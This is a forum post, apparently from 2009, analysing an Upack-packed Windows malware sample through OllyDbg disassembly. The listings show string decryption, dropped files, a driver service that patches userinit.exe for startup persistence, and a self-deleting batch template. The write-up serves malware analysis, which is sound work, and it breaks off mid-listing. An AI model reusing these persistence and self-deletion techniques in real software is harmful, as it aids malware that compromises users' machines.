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发表于 2009-4-8 21:27
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子! 病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途! 禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
程序加的是壳是:Upack 2.4 - 2.9 beta -> Dwing [Overlay]
脱壳 很简单,OD载入后,单步跟或直接往下拉,找到下面的代码00426C60 85C0 test eax ,eax
00426C62 - 0F84 DFB0FDFF je g1[1 ].00401D47
00426C68 56 push esi
00426C69 97 xchg eax ,edi
00426C6A FF53 FC call dword ptr ds :[ebx -4 ]
然后在00426C62 - 0F84 DFB0FDFF je g1[1].00401D47处设置条件断点为:
00401D47 55 push ebp
00401D48 8BEC mov ebp ,esp
00401D4A 6A FF push -1
00401D4C 68 30614000 push g1[1 ].00406130
00401D51 68 FC384000 push g1[1 ].004038FC
00401D56 64 :A1 00000000 mov eax ,dword ptr fs :[0 ]
00401D5C 50 push eax
00401D5D 64 :8925 00000000 mov dword ptr fs :[0 ],esp
00401D64 83EC 58 sub esp ,58
00401D67 53 push ebx
00401D68 56 push esi
00401D69 57 push edi
00401D6A 8965 E8 mov dword ptr ss :[ebp -18 ],esp
00401D6D FF15 9C604000 call dword ptr ds :[40609C]
一、创建系统快照,利用PROCESSENTRY32的结构,返回父进程的PID:typedef struct tagPROCESSENTRY32
DWORD dwSize;
DWORD cntUsage;
DWORD th32ProcessID;
DWORD th32DefaultHeapID;
DWORD th32ModuleID;
DWORD cntThreads;
DWORD th32ParentProcessID;
LONG pcPriClassBase;
DWORD dwFlags;
char szExeFile[MAX_PATH];
00401685 E8 46FFFFFF call UnPacked. 004015D0
004015D0 /nbsp
004015D6 |. 56 push esi
004015D7 |. 57 push edi
004015D8 |. 33C0 xor eax ,eax
004015DA |. B9 49000000 mov ecx ,49
004015DF |. 8D7C24 0C lea edi ,dword ptr ss :[esp +C]
004015E3 |. C74424 08 00000000 mov dword ptr ss :[esp +8 ],0
004015EB |. 50 push eax
004015EC |. 6A 02 push 2
004015EE |. F3:AB rep stos dword ptr es :[edi ]
004015F0 |. E8 07060000 call <jmp .&kernel32. CreateToolhelp32Snapshot>
004015F5 |. 8BF0 mov esi ,eax
004015F7 |. 83FE FF cmp esi ,-1
004015FA |. 75 0B jnz short UnPacked.00401607
004015FC |. 5F pop edi
004015FD |. 33C0 xor eax ,eax
004015FF |. 5E pop esi
00401600 |. 81C4 28010000 add esp ,128
00401606 |. C3 retn
00401607 |> 8D4424 08 lea eax ,dword ptr ss :[esp +8 ]
0040160B |. C74424 08 28010000 mov dword ptr ss :[esp +8 ],128
00401613 |. 50 push eax
00401614 |. 56 push esi
00401615 |. E8 DC050000 call <jmp .&kernel32. Process32First>
0040161A |. 85C0 test eax ,eax
0040161C |. 74 21 je short UnPacked. 0040163F
0040161E |. 8B3D 80604000 mov edi ,dword ptr ds :[<&kernel32. GetCurrentP>
00401624 |. FFD7 call edi
00401626 |. 394424 10 cmp dword ptr ss :[esp +10 ],eax
0040162A |. 74 13 je short UnPacked. 0040163F
0040162C |> 8D4C24 08 /lea ecx ,dword ptr ss :[esp +8 ]
00401630 |. 51 |push ecx
00401631 |. 56 |push esi
00401632 |. E8 B9050000 |call <jmp .&kernel32. Process32Next>
00401637 |. FFD7 |call edi
00401639 |. 394424 10 |cmp dword ptr ss :[esp +10 ],eax
0040163D |.^ 75 ED \jnz short UnPacked. 0040162C
0040163F |> 8B4424 20 mov eax ,dword ptr ss :[esp +20 ]
00401643 |. 5F pop edi
00401644 |. 5E pop esi
00401645 |. 81C4 28010000 add esp ,128
0040164B \. C3 retn
已经被加密的字符串004016 D2 . BF F8704000 mov edi,UnPacked.004070 F8
00401794 . BF E8704000 mov edi,UnPacked.004070 E8
00401873 . BF DC704000 mov edi,UnPacked.004070 DC
解密函数:0040170A . E8 F1F8FFFF call <UnPacked.解密算法>
0040100F |. B8 02000000 mov eax ,2
00401014 |. 8B4D 0C mov ecx ,dword ptr ss :[ebp +C]
00401017 |> 3106 /xor dword ptr ds :[esi ],eax
00401019 |. 46 |inc esi
0040101A |.^ E2 FB \loopd short UnPacked.00401017
//算法很简单,就是加密字符串的每一位与0x2 异或,所得结果即是解密后的字符串
^^iknnfnn,fnn 解密为\\killdll.dll
三、在系统目录下创建文件:C:\WINDOWS\system32\\killdll.dll0040178F . E8 CCF8FFFF call UnPacked.00401060
00401060 /nbsp
00401064 |. 8B4C24 08 mov ecx ,dword ptr ss :[esp +8 ]
00401068 |. 53 push ebx
00401069 |. 56 push esi
0040106A |. 57 push edi
0040106B |. 50 push eax
0040106C |. 51 push ecx
0040106D |. 6A 00 push 0
0040106F |. FF15 68604000 call dword ptr ds :[<&kernel32. FindResourceA>>
00401075 |. 8BF0 mov esi ,eax
00401077 |. 85F6 test esi ,esi
00401079 |. 74 60 je short UnPacked. 004010DB
0040107B |. 56 push esi
0040107C |. 6A 00 push 0
0040107E |. FF15 6C604000 call dword ptr ds :[<&kernel32. SizeofResource>
00401084 |. 8BD8 mov ebx ,eax
00401086 |. 85DB test ebx ,ebx
00401088 |. 74 51 je short UnPacked. 004010DB
0040108A |. 56 push esi
0040108B |. 6A 00 push 0
0040108D |. FF15 70604000 call dword ptr ds :[<&kernel32. LoadResource>]
00401093 |. 8BF8 mov edi ,eax
00401095 |. 85FF test edi ,edi
00401097 |. 74 42 je short UnPacked. 004010DB
00401099 |. 8B5424 10 mov edx ,dword ptr ss :[esp +10 ]
0040109D |. 6A 00 push 0
0040109F |. 6A 00 push 0
004010A1 |. 6A 02 push 2
004010A3 |. 6A 00 push 0
004010A5 |. 6A 00 push 0
004010A7 |. 68 00000040 push 40000000
004010AC |. 52 push edx
004010AD |. FF15 74604000 call dword ptr ds :[<&kernel32. CreateFileA>]
004010B3 |. 8BF0 mov esi ,eax
004010B5 |. 85F6 test esi ,esi
004010B7 |. 75 04 jnz short UnPacked. 004010BD
004010B9 |. 5F pop edi
004010BA |. 5E pop esi
004010BB |. 5B pop ebx
004010BC |. C3 retn
004010BD |> 8D4424 18 lea eax ,dword ptr ss :[esp +18 ]
004010C1 |. 6A 00 push 0
004010C3 |. 50 push eax
004010C4 |. 53 push ebx
004010C5 |. 57 push edi
004010C6 |. FF15 78604000 call dword ptr ds :[<&kernel32. LockResource>]
004010CC |. 50 push eax
004010CD |. 56 push esi
004010CE |. FF15 7C604000 call dword ptr ds :[<&kernel32. WriteFile>]
004010D4 |. 56 push esi
004010D5 |. FF15 84604000 call dword ptr ds :[<&kernel32. CloseHandle>]
004010DB |> 5F pop edi
004010DC |. 5E pop esi
004010DD |. 83C8 FF or eax ,FFFFFFFF
004010E0 |. 5B pop ebx
004010E1 \. C3 retn
四、把生成的killdll.dll用rundll32.exe进行加载,方式为隐藏方式。004018E7 . 50 push eax
004018E8 . F3:A4 rep movs byte ptr es :[edi ],byte ptr ds :[esi ]
004018EA . 8DBD FCFCFFFF lea edi ,dword ptr ss :[ebp -304 ]
004018F0 . 83C9 FF or ecx ,FFFFFFFF
004018F3 . F2:AE repne scas byte ptr es :[edi ]
004018F5 . F7D1 not ecx
004018F7 . 2BF9 sub edi ,ecx
004018F9 . 8BF7 mov esi ,edi
004018FB . 8BD9 mov ebx ,ecx
004018FD . 8BFA mov edi ,edx
004018FF . 83C9 FF or ecx ,FFFFFFFF
00401902 . F2:AE repne scas byte ptr es :[edi ]
00401904 . 8BCB mov ecx ,ebx
00401906 . 4F dec edi
00401907 . C1E9 02 shr ecx ,2
0040190A . F3:A5 rep movs dword ptr es :[edi ],dword ptr ds :[es >
0040190C . 8BCB mov ecx ,ebx
0040190E . 8D85 FCFDFFFF lea eax ,dword ptr ss :[ebp -204 ]
00401914 . 83E1 03 and ecx ,3
00401917 . 50 push eax
00401918 . F3:A4 rep movs byte ptr es :[edi ],byte ptr ds :[esi ]
0040191A . FF15 2C604000 call dword ptr ds :[<&kernel32. WinExec>]
五、在临时目录下生成文件~Frm.exe,并且运行它00401942 . 51 push ecx
00401943 . 68 04010000 push 104
00401948 . FF15 38604000 call dword ptr ds :[<&kernel32. GetTempPathA>]
0040194E . 8D95 F8FBFFFF lea edx ,dword ptr ss :[ebp -408 ]
00401954 . BF D0704000 mov edi ,UnPacked. 004070D0
00401959 . 83C9 FF or ecx ,FFFFFFFF
0040195C . 33C0 xor eax ,eax
0040195E . F2:AE repne scas byte ptr es :[edi ]
00401960 . F7D1 not ecx
00401962 . 2BF9 sub edi ,ecx
00401964 . 68 74704000 push UnPacked.00407074
00401969 . 8BF7 mov esi ,edi
0040196B . 8BFA mov edi ,edx
0040196D . 8BD1 mov edx ,ecx
0040196F . 83C9 FF or ecx ,FFFFFFFF
00401972 . F2:AE repne scas byte ptr es :[edi ]
00401974 . 8BCA mov ecx ,edx
00401976 . 4F dec edi
00401977 . C1E9 02 shr ecx ,2
0040197A . F3:A5 rep movs dword ptr es :[edi ],dword ptr ds :[es >
0040197C . 8BCA mov ecx ,edx
0040197E . 8D85 F8FBFFFF lea eax ,dword ptr ss :[ebp -408 ]
00401984 . 83E1 03 and ecx ,3
00401987 . 6A 7D push 7D
00401989 . F3:A4 rep movs byte ptr es :[edi ],byte ptr ds :[esi ]
0040198B . 50 push eax
0040198C . E8 CFF6FFFF call UnPacked.00401060
00401991 . 83C4 0C add esp ,0C
00401994 . 8D8D F8FBFFFF lea ecx ,dword ptr ss :[ebp -408 ]
0040199A . 6A 05 push 5
0040199C . 51 push ecx
0040199D . FF15 2C604000 call dword ptr ds :[<&kernel32. WinExec>]
删除killdll.dll:004019AA . 8D95 F4F8FFFF lea edx ,dword ptr ss :[ebp -70C]
004019B0 . 52 push edx
004019B1 . FF15 24604000 call dword ptr ds :[<&kernel32. DeleteFileA>]
复制本身到C:\WINDOWS\system32目录下,命名为updater.exe004019C4 . 68 04010000 push 104
004019C9 . F3:AB rep stos dword ptr es :[edi ]
004019CB . 8D85 F0F6FFFF lea eax ,dword ptr ss :[ebp -910 ]
004019D1 . 50 push eax
004019D2 . FF15 54604000 call dword ptr ds :[<&kernel32. GetSystemDirec>
004019D8 . BF C0704000 mov edi ,UnPacked. 004070C0
004019DD . 83C9 FF or ecx ,FFFFFFFF
004019E0 . 33C0 xor eax ,eax
004019E2 . 8D95 F0F6FFFF lea edx ,dword ptr ss :[ebp -910 ]
004019E8 . F2:AE repne scas byte ptr es :[edi ]
004019EA . F7D1 not ecx
004019EC . 2BF9 sub edi ,ecx
004019EE . 68 FF000000 push 0FF
004019F3 . 8BF7 mov esi ,edi
004019F5 . 8BFA mov edi ,edx
004019F7 . 8BD1 mov edx ,ecx
004019F9 . 83C9 FF or ecx ,FFFFFFFF
004019FC . F2:AE repne scas byte ptr es :[edi ]
004019FE . 8BCA mov ecx ,edx
00401A00 . 4F dec edi
00401A01 . C1E9 02 shr ecx ,2
00401A04 . F3:A5 rep movs dword ptr es :[edi ],dword ptr ds :[es >
00401A06 . 8BCA mov ecx ,edx
00401A08 . 83E1 03 and ecx ,3
00401A0B . F3:A4 rep movs byte ptr es :[edi ],byte ptr ds :[esi ]
00401A0D . B9 3F000000 mov ecx ,3F
00401A12 . 8DBD F0F5FFFF lea edi ,dword ptr ss :[ebp -A10]
00401A18 . F3:AB rep stos dword ptr es :[edi ]
00401A1A . 66 :AB stos word ptr es :[edi ]
00401A1C . AA stos byte ptr es :[edi ]
00401A1D . 8D85 F0F5FFFF lea eax ,dword ptr ss :[ebp -A10]
00401A23 . 50 push eax
00401A24 . 6A 00 push 0
00401A26 . FF15 34604000 call dword ptr ds :[<&kernel32. GetModuleFileN>
00401A2C . 8D8D F0F6FFFF lea ecx ,dword ptr ss :[ebp -910 ]
00401A32 . 6A 01 push 1
00401A34 . 8D95 F0F5FFFF lea edx ,dword ptr ss :[ebp -A10]
00401A3A . 51 push ecx
00401A3B . 52 push edx
00401A3C . FF15 4C604000 call dword ptr ds :[<&kernel32. MoveFileExA>]
00401B8B . E8 60F5FFFF call UnPacked.004010F0 ; 创建驱动pcidump.sys
八、创建服务,目的用来加载驱动pcidump.sys00401B97 . E8 14F6FFFF call UnPacked. 004011B0
004011B0 /nbsp
004011B3 |. 56 push esi
004011B4 |. 68 3F000F00 push 0F003F
004011B9 |. 6A 00 push 0
004011BB |. 6A 00 push 0
004011BD |. FF15 18604000 call dword ptr ds :[<&advapi32. OpenSCManagerA>
004011C3 |. 8BF0 mov esi ,eax
004011C5 |. 85F6 test esi ,esi
004011C7 |. 0F84 0D010000 je UnPacked. 004012DA
004011CD |. 53 push ebx
004011CE |. 8B5C24 28 mov ebx ,dword ptr ss :[esp +28 ]
004011D2 |. 55 push ebp
004011D3 |. 57 push edi
004011D4 |. 6A 00 push 0
004011D6 |. 6A 00 push 0
004011D8 |. 6A 00 push 0
004011DA |. 6A 00 push 0
004011DC |. 6A 00 push 0
004011DE |. 8B2D 00604000 mov ebp ,dword ptr ds :[<&advapi32. CreateServi>
004011E4 |. 53 push ebx
004011E5 |. 6A 00 push 0
004011E7 |. 6A 03 push 3
004011E9 |. 6A 01 push 1
004011EB |. 68 FF010F00 push 0F01FF
004011F0 |. 68 7C704000 push UnPacked. 0040707C
004011F5 |. 68 7C704000 push UnPacked. 0040707C
004011FA |. 56 push esi
004011FB |. FFD5 call ebp
004011FD |. 85C0 test eax ,eax
004011FF |. 75 5A jnz short UnPacked. 0040125B
00401201 |. 68 FF010F00 push 0F01FF
00401206 |. 68 7C704000 push UnPacked. 0040707C
0040120B |. 56 push esi
0040120C |. FF15 04604000 call dword ptr ds :[<&advapi32. OpenServiceA>]
00401212 |. 8BF8 mov edi ,eax
00401214 |. 85FF test edi ,edi
00401216 |. 74 1C je short UnPacked.00401234
00401218 |. 8D4424 10 lea eax ,dword ptr ss :[esp +10 ]
0040121C |. 50 push eax
0040121D |. 6A 01 push 1
0040121F |. 57 push edi
00401220 |. FF15 08604000 call dword ptr ds :[<&advapi32. ControlService>
00401226 |. 57 push edi
00401227 |. FF15 0C604000 call dword ptr ds :[<&advapi32. DeleteService>>
0040122D |. 57 push edi
0040122E |. FF15 10604000 call dword ptr ds :[<&advapi32. CloseServiceHa>
00401234 |> 6A 00 push 0
00401236 |. 6A 00 push 0
00401238 |. 6A 00 push 0
0040123A |. 6A 00 push 0
0040123C |. 6A 00 push 0
0040123E |. 53 push ebx
0040123F |. 6A 00 push 0
00401241 |. 6A 03 push 3
00401243 |. 6A 01 push 1
00401245 |. 68 FF010F00 push 0F01FF
0040124A |. 68 7C704000 push UnPacked. 0040707C
0040124F |. 68 7C704000 push UnPacked. 0040707C
00401254 |. 56 push esi
00401255 |. FFD5 call ebp
00401257 |. 85C0 test eax ,eax
00401259 |. 74 66 je short UnPacked. 004012C1
0040125B |> 50 push eax
0040125C |. FF15 10604000 call dword ptr ds :[<&advapi32. CloseServiceHa>
00401262 |. 6A 10 push 10
00401264 |. 68 7C704000 push UnPacked. 0040707C
00401269 |. 56 push esi
0040126A |. FF15 04604000 call dword ptr ds :[<&advapi32. OpenServiceA>]
00401270 |. 8BF8 mov edi ,eax
00401272 |. 85FF test edi ,edi
00401274 |. 74 4B je short UnPacked. 004012C1
00401276 |. 6A 00 push 0
00401278 |. 6A 00 push 0
0040127A |. 57 push edi
0040127B |. FF15 14604000 call dword ptr ds :[<&advapi32. StartServiceA>>
00401281 |. 85C0 test eax ,eax
00401283 |. 75 20 jnz short UnPacked. 004012A5
00401285 |. FF15 20604000 call dword ptr ds :[<&kernel32. GetLastError>]
0040128B |. 57 push edi
0040128C |. 8BD8 mov ebx ,eax
0040128E |. FF15 10604000 call dword ptr ds :[<&advapi32. CloseServiceHa>
00401294 |. 56 push esi
00401295 |. FF15 10604000 call dword ptr ds :[<&advapi32. CloseServiceHa>
0040129B |. 5F pop edi
0040129C |. 8BC3 mov eax ,ebx
0040129E |. 5D pop ebp
0040129F |. 5B pop ebx
004012A0 |. 5E pop esi
004012A1 |. 83C4 1C add esp ,1C
004012A4 |. C3 retn
004012A5 |> 8B5C24 30 mov ebx ,dword ptr ss :[esp +30 ]
004012A9 |. 57 push edi
004012AA |. FF15 10604000 call dword ptr ds :[<&advapi32. CloseServiceHa>
004012B0 |. 56 push esi
004012B1 |. FF15 10604000 call dword ptr ds :[<&advapi32. CloseServiceHa>
004012B7 |. 5F pop edi
004012B8 |. 8BC3 mov eax ,ebx
004012BA |. 5D pop ebp
004012BB |. 5B pop ebx
004012BC |. 5E pop esi
004012BD |. 83C4 1C add esp ,1C
004012C0 |. C3 retn
004012C1 |> FF15 20604000 call dword ptr ds :[<&kernel32. GetLastError>]
004012C7 |. 56 push esi
004012C8 |. 8BD8 mov ebx ,eax
004012CA |. FF15 10604000 call dword ptr ds :[<&advapi32. CloseServiceHa>
004012D0 |. 5F pop edi
004012D1 |. 8BC3 mov eax ,ebx
004012D3 |. 5D pop ebp
004012D4 |. 5B pop ebx
004012D5 |. 5E pop esi
004012D6 |. 83C4 1C add esp ,1C
004012D9 |. C3 retn
004012DA |> FF15 20604000 call dword ptr ds :[<&kernel32. GetLastError>]
004012E0 |. 5E pop esi
004012E1 |. 83C4 1C add esp ,1C
004012E4 \. C3 retn
九、创建驱动管道,用来进行驱动通信00401BAA . E8 B1F7FFFF call UnPacked.00401360
00401360 nbsp
00401361 . 8BEC mov ebp ,esp
00401363 . 83EC 10 sub esp ,10
00401366 . 53 push ebx
00401367 . 56 push esi
00401368 . 57 push edi
00401369 . 60 pushad
0040136A . F5 cmc
0040136B . 90 nop
0040136C . F5 cmc
0040136D . 90 nop
0040136E . 74 0D je short UnPacked. 0040137D
00401370 . 75 0B jnz short UnPacked. 0040137D
00401372 E8 db E8
00401373 CC int3
00401374 E9 db E9
00401375 .^ E1 E2 loopde short UnPacked.00401359
00401377 .^ E3 E4 jecxz short UnPacked. 0040135D
00401379 . E5 E6 in eax ,0E6
0040137B . E7 E8 out 0E8,eax
0040137D > 61 popad
0040137E . 68 90010000 push 190
00401383 . 6A 01 push 1
00401385 . E8 E1080000 call UnPacked. 00401C6B
0040138A . 6A 08 push 8
0040138C . 6A 01 push 1
0040138E . 8BD8 mov ebx ,eax
00401390 . E8 D6080000 call UnPacked. 00401C6B
00401395 . 83C4 10 add esp ,10
00401398 . 8945 FC mov dword ptr ss :[ebp -4 ],eax
0040139B . 6A 00 push 0
0040139D . 68 80000000 push 80
004013A2 . 6A 03 push 3
004013A4 . 6A 00 push 0
004013A6 . 6A 00 push 0
004013A8 . 68 000000C0 push C0000000
004013AD . 68 84704000 push UnPacked.00407084
004013B2 . FF15 74604000 call dword ptr ds :[<&kernel32. CreateFileA>]
004013B8 . 8945 F0 mov dword ptr ss :[ebp -10 ],eax
004013BB . FF15 20604000 call dword ptr ds :[<&kernel32. GetLastError>]
004013C1 . 8B7D 0C mov edi ,dword ptr ss :[ebp +C]
004013C4 . 83C9 FF or ecx ,FFFFFFFF
004013C7 . 33C0 xor eax ,eax
004013C9 . 8D93 C8000000 lea edx ,dword ptr ds :[ebx +C8]
004013CF . F2:AE repne scas byte ptr es :[edi ]
004013D1 . F7D1 not ecx
004013D3 . 2BF9 sub edi ,ecx
004013D5 . 8955 F4 mov dword ptr ss :[ebp -C],edx
004013D8 . 8BC1 mov eax ,ecx
004013DA . 8BF7 mov esi ,edi
004013DC . 8BFB mov edi ,ebx
004013DE . C1E9 02 shr ecx ,2
004013E1 . F3:A5 rep movs dword ptr es :[edi ],dword ptr ds :[es >
004013E3 . 8BC8 mov ecx ,eax
004013E5 . 33C0 xor eax ,eax
004013E7 . 83E1 03 and ecx ,3
004013EA . F3:A4 rep movs byte ptr es :[edi ],byte ptr ds :[esi ]
004013EC . 8B7D 08 mov edi ,dword ptr ss :[ebp +8 ]
004013EF . 83C9 FF or ecx ,FFFFFFFF
004013F2 . F2:AE repne scas byte ptr es :[edi ]
004013F4 . F7D1 not ecx
004013F6 . 2BF9 sub edi ,ecx
004013F8 . 8BC1 mov eax ,ecx
004013FA . 8BF7 mov esi ,edi
004013FC . 8BFA mov edi ,edx
004013FE . 8BD0 mov edx ,eax
00401400 . 83C9 FF or ecx ,FFFFFFFF
00401403 . 33C0 xor eax ,eax
00401405 . F2:AE repne scas byte ptr es :[edi ]
00401407 . 8BCA mov ecx ,edx
00401409 . 4F dec edi
0040140A . C1E9 02 shr ecx ,2
0040140D . F3:A5 rep movs dword ptr es :[edi ],dword ptr ds :[es >
0040140F . 8BCA mov ecx ,edx
00401411 . 83E1 03 and ecx ,3
00401414 . F3:A4 rep movs byte ptr es :[edi ],byte ptr ds :[esi ]
00401416 . 895D FC mov dword ptr ss :[ebp -4 ],ebx
00401419 . 8B45 F4 mov eax ,dword ptr ss :[ebp -C]
0040141C . 8945 00 mov dword ptr ss :[ebp ],eax
0040141F . 33C0 xor eax ,eax
00401421 . 8B45 F0 mov eax ,dword ptr ss :[ebp -10 ]
00401424 . 85C0 test eax ,eax
00401426 . 74 20 je short UnPacked.00401448
00401428 . 8D4D F8 lea ecx ,dword ptr ss :[ebp -8 ]
0040142B . 6A 00 push 0
0040142D . 51 push ecx
0040142E . 6A 00 push 0
00401430 . 6A 00 push 0
00401432 . 8D55 FC lea edx ,dword ptr ss :[ebp -4 ]
00401435 . 6A 08 push 8
00401437 . 52 push edx
00401438 . 68 14202200 push 222014
0040143D . 50 push eax
0040143E . FF15 28604000 call dword ptr ds :[<&kernel32. DeviceIoContro>
00401444 . 33F6 xor esi ,esi
00401446 . EB 03 jmp short UnPacked. 0040144B
00401448 > 83CE FF or esi ,FFFFFFFF
0040144B > 8B45 FC mov eax ,dword ptr ss :[ebp -4 ]
0040144E . 50 push eax
0040144F . E8 AE070000 call UnPacked. 00401C02
00401454 . 53 push ebx
00401455 . E8 A8070000 call UnPacked. 00401C02
0040145A . 83C4 08 add esp ,8
0040145D . 8BC6 mov eax ,esi
0040145F . 5F pop edi
00401460 . 5E pop esi
00401461 . 5B pop ebx
00401462 . 8BE5 mov esp ,ebp
00401464 . 5D pop ebp
00401465 . C3 retn
该驱动的目的是进行通信来修改userinit.exe,把C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~Frm.exe插入到C:\WINDOWS\system32\userinit.exe,来实现开机启动0012 F50C 0012 F92C ASCII "\??\C:\WINDOWS\system32\userinit.exe"
0012 F510 0012 F728 ASCII "\??\C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~Frm.exe"
0012 F514 0012 FA2C ASCII "C:\WINDOWS\system32\drivers\pcidump.sys"
十、卸载掉该驱动,然后删除之004012F0 /nbsp
004012F3 |. 57 push edi
004012F4 |. 6A 02 push 2
004012F6 |. 6A 00 push 0
004012F8 |. 6A 00 push 0
004012FA |. FF15 18604000 call dword ptr ds :[<&advapi32. OpenSCManagerA>
00401300 |. 8BF8 mov edi ,eax
00401302 |. 85FF test edi ,edi
00401304 |. 74 3C je short UnPacked.00401342
00401306 |. 53 push ebx
00401307 |. 56 push esi
00401308 |. 68 20000100 push 10020
0040130D |. 68 7C704000 push UnPacked. 0040707C
00401312 |. 57 push edi
00401313 |. FF15 04604000 call dword ptr ds :[<&advapi32. OpenServiceA>]
00401319 |. 8B1D 10604000 mov ebx ,dword ptr ds :[<&advapi32. CloseServic>
0040131F |. 8BF0 mov esi ,eax
00401321 |. 85F6 test esi ,esi
00401323 |. 74 18 je short UnPacked. 0040133D
00401325 |. 8D4424 0C lea eax ,dword ptr ss :[esp +C]
00401329 |. 50 push eax
0040132A |. 6A 01 push 1
0040132C |. 56 push esi
0040132D |. FF15 08604000 call dword ptr ds :[<&advapi32. ControlService>
00401333 |. 56 push esi
00401334 |. FF15 0C604000 call dword ptr ds :[<&advapi32. DeleteService>>
0040133A |. 56 push esi
0040133B |. FFD3 call ebx
0040133D |> 57 push edi
0040133E |. FFD3 call ebx
00401340 |. 5E pop esi
00401341 |. 5B pop ebx
00401342 |> 8B4C24 24 mov ecx ,dword ptr ss :[esp +24 ]
00401346 |. 51 push ecx
00401347 |. FF15 24604000 call dword ptr ds :[<&kernel32. DeleteFileA>]
0040134D |. 5F pop edi
0040134E |. 83C4 1C add esp ,1C
00401351 \. C3 retn
十一、在临时文件夹下创建批处理_undelme.bat,并且运行之,目的是用来删除自身00401BD2 . E8 99F8FFFF call UnPacked.00401470 ; 删除自身
00401470 /nbsp; 81EC 04050000 sub esp ,504
00401476 |. 8D8424 08010000 lea eax ,dword ptr ss :[esp +108]
0040147D |. 53 push ebx
0040147E |. 56 push esi
0040147F |. 57 push edi
00401480 |. 50 push eax ; /Buffer
00401481 |. 68 04010000 push 104 ; |BufSize = 104 (260 .)
00401486 |. FF15 38604000 call dword ptr ds:[<&kernel32.GetTempPathA>] ; \GetTempPathA
0040148C |. BF 20614000 mov edi,UnPacked.00406120 ; ASCII "_undelme.bat"
00401491 |. 83C9 FF or ecx,FFFFFFFF
00401494 |. 33C0 xor eax,eax
00401496 |. 8D9424 14010000 lea edx,dword ptr ss:[esp+114 ]
0040149D |. F2:AE repne scas byte ptr es:[edi]
0040149F |. F7D1 not ecx
004014A1 |. 2BF9 sub edi ,ecx
004014A3 |. 68 04010000 push 104 ; /BufSize = 104 (260 .)
004014A8 |. 8BF7 mov esi,edi ; |
004014AA |. 8BD9 mov ebx,ecx ; |
004014AC |. 8BFA mov edi,edx ; |
004014AE |. 83C9 FF or ecx,FFFFFFFF ; |
004014B1 |. F2:AE repne scas byte ptr es:[edi] ; |
004014B3 |. 8BCB mov ecx,ebx ; |
004014B5 |. 4F dec edi ; |
004014B6 |. C1E9 02 shr ecx,2 ; |
004014B9 |. F3:A5 rep movs dword ptr es:[edi],dword ptr ds:[es>; |
004014BB |. 8BCB mov ecx,ebx ; |
004014BD |. 8D4424 14 lea eax,dword ptr ss:[esp+14 ] ; |
004014C1 |. 83E1 03 and ecx,3 ; |
004014C4 |. 50 push eax ; |PathBuffer
004014C5 |. F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[esi] ; |
004014C7 |. 6A 00 push 0 ; |hModule = NULL
004014C9 |. FF15 34604000 call dword ptr ds:[<&kernel32.GetModuleFileN>; \GetModuleFileNameA
004014CF |. 8D4C24 10 lea ecx,dword ptr ss:[esp+10 ]
004014D3 |. 68 04010000 push 104 ; /MaxShortPathSize = 104 (260.)
004014D8 |. 8D5424 14 lea edx,dword ptr ss:[esp+14] ; |
004014DC |. 51 push ecx ; |ShortPath
004014DD |. 52 push edx ; |LongPath
004014DE |. FF15 30604000 call dword ptr ds:[<&kernel32.GetShortPathNa>; \GetShortPathNameA
004014E4 |. 8D7C24 10 lea edi,dword ptr ss:[esp+10]
004014E8 |. 83C9 FF or ecx,FFFFFFFF
004014EB |. 33C0 xor eax,eax
004014ED |. 8D9424 18020000 lea edx,dword ptr ss:[esp+218]
004014F4 |. F2:AE repne scas byte ptr es:[edi]
004014F6 |. F7D1 not ecx
004014F8 |. 2BF9 sub edi,ecx
004014FA |. 6A 5C push 5C
004014FC |. 8BC1 mov eax,ecx
004014FE |. 8BF7 mov esi,edi
00401500 |. 8BFA mov edi,edx
00401502 |. C1E9 02 shr ecx,2
00401505 |. F3:A5 rep movs dword ptr es:[edi],dword ptr ds:[es>
00401507 |. 8BC8 mov ecx,eax
00401509 |. 83E1 03 and ecx,3
0040150C |. F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[esi]
0040150E |. 8D8C24 1C020000 lea ecx,dword ptr ss:[esp+21C]
00401515 |. 51 push ecx
00401516 |. E8 05080000 call UnPacked.00401D20
0040151B |. 83C4 08 add esp,8
0040151E |. 85C0 test eax,eax
00401520 |. 74 03 je short UnPacked.00401525
00401522 |. C600 00 mov byte ptr ds:[eax],0
00401525 |> 6A 00 push 0 ; / hTemplateFile = NULL
00401527 |. 68 80000000 push 80 ; |Attributes = NORMAL
0040152C |. 6A 02 push 2 ; |Mode = Create_ALWAYS
0040152E |. 6A 00 push 0 ; |pSecurity = NULL
00401530 |. 6A 00 push 0 ; |ShareMode = 0
00401532 |. 8D9424 28010000 lea edx,dword ptr ss:[esp+128 ] ; |
00401539 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
0040153E |. 52 push edx ; |FileName
0040153F |. FF15 74604000 call dword ptr ds:[<&kernel32.CreateFileA>] ; \CreateFileA
00401545 |. 8BF0 mov esi,eax
00401547 |. 83FE FF cmp esi,-1
0040154A |. 74 6F je short UnPacked.004015BB
0040154C |. 8D8424 14010000 lea eax,dword ptr ss:[esp+114 ]
00401553 |. 8D8C24 18020000 lea ecx,dword ptr ss:[esp+218 ]
0040155A |. 50 push eax ; /<%s>
0040155B |. 8D5424 14 lea edx,dword ptr ss:[esp+14] ; |
0040155F |. 51 push ecx ; |<%s>
00401560 |. 8D4424 18 lea eax,dword ptr ss:[esp+18] ; |
00401564 |. 52 push edx ; |<%s>
00401565 |. 50 push eax ; |<%s>
00401566 |. 8D8C24 2C030000 lea ecx,dword ptr ss:[esp+32C] ; |
0040156D |. 68 30704000 push UnPacked.00407030 ; |Format = ":Repeat
del "%s"
if exist "%s" goto Repeat
rmdir %s
del "%s""
00401572 |. 51 push ecx ; |s
00401573 |. FF15 10614000 call dword ptr ds:[<&user32.wsprintfA>] ; \wsprintfA
00401579 |. 8DBC24 34030000 lea edi,dword ptr ss:[esp+334]
00401580 |. 83C9 FF or ecx,FFFFFFFF
00401583 |. 33C0 xor eax,eax
00401585 |. 83C4 18 add esp,18
00401588 |. F2:AE repne scas byte ptr es:[edi]
0040158A |. F7D1 not ecx
0040158C |. 8D5424 0C lea edx,dword ptr ss:[esp+C]
00401590 |. 6A 00 push 0 ; /p Overlapped = NULL
00401592 |. 49 dec ecx ; |
